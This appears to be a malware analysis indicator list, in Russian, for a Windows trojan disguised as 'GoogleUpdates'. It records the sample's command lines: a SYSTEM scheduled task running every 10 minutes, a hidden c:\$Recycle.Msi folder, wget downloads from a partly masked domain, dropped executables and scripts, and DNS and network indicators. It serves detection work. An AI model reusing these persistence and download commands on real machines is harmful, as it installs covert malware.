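Техническая информация
Подзаголовки разделов в списке ниже не сохранились; по содержанию в нём идут подряд: файл задания планировщика Windows (.job), командные строки процессов, пути файлов в %TEMP% и C:\$Recycle.Msi, сетевые индикаторы (узел и порт 80, URL, DNS-запрос) и классы окон. Имя домена приведено в частично замаскированном виде (символы ###). Для обнаружения наиболее показательны задача планировщика GoogleUpdates (schtasks /Create, запуск каждые 10 минут от имени SYSTEM из каталога c:\$Recycle.Msi), присвоение этому каталогу атрибутов «системный» и «скрытый» (attrib +S +H) и запуск wget.exe из %TEMP%.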
- %WINDIR%\Tasks\GoogleUpdates.job
- '%TEMP%\wget.exe' --load-cookies cookies.txt http://ms###st.name/2.php
- '%TEMP%\wget.exe' http://ms###st.name/17:24:44..ini
- '%TEMP%\wget.exe' http://ms###st.name/work.ini
- '%TEMP%\google.exe' -p1234567890__
- '%TEMP%\setups.exe' -p1234567890__
- '%TEMP%\wget.exe' --save-cookies cookies.txt http://ms###st.name/1.php
- '%TEMP%\GoogleUpdates.exe'
- '<SYSTEM32>\schtasks.exe' /Create /tn GoogleUpdates /TR "c:\$Recycle.Msi\GoogleUpdates.exe" /SC MINUTE /mo 10 /ru "SYSTEM"
- '<SYSTEM32>\schtasks.exe' /Delete /tn GoogleUpdates /f
- '<SYSTEM32>\ping.exe' -n 3 127.0.0.1
- '<SYSTEM32>\wscript.exe' "%TEMP%\Google.vbs"
- '<SYSTEM32>\attrib.exe' +S +H "c:\$Recycle.Msi"
- '<SYSTEM32>\ping.exe' -n 10 127.0.0.1
- '<SYSTEM32>\wscript.exe' "%TEMP%\setup.vbs"
- '<SYSTEM32>\attrib.exe' -S -H "c:\$Recycle.Msi"
- '<SYSTEM32>\find.exe' "Microsoft Windows XP"
- C:\$Recycle.Msi\cookies.txt
- C:\$Recycle.Msi\GoogleUpdates.exe
- %TEMP%\cookies.txt
- %TEMP%\Google.vbs
- %TEMP%\Google.cmd
- %TEMP%\google.exe
- %TEMP%\setup.cmd
- %TEMP%\GoogleUpdates.exe
- %TEMP%\setups.exe
- %TEMP%\1.php
- %TEMP%\wget.exe
- %TEMP%\setup.vbs
- %TEMP%\GoogleUpdates.exe
- 'ms###st.name':80
- ms###st.name/1.php
- DNS ASK ms###st.name
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'